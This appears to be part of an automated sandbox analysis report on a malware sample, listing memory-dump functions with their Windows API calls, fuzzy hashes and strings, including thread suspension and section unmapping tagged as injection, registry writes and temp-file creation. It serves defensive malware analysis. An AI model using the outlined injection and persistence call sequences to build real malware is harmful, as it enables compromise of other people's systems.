  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
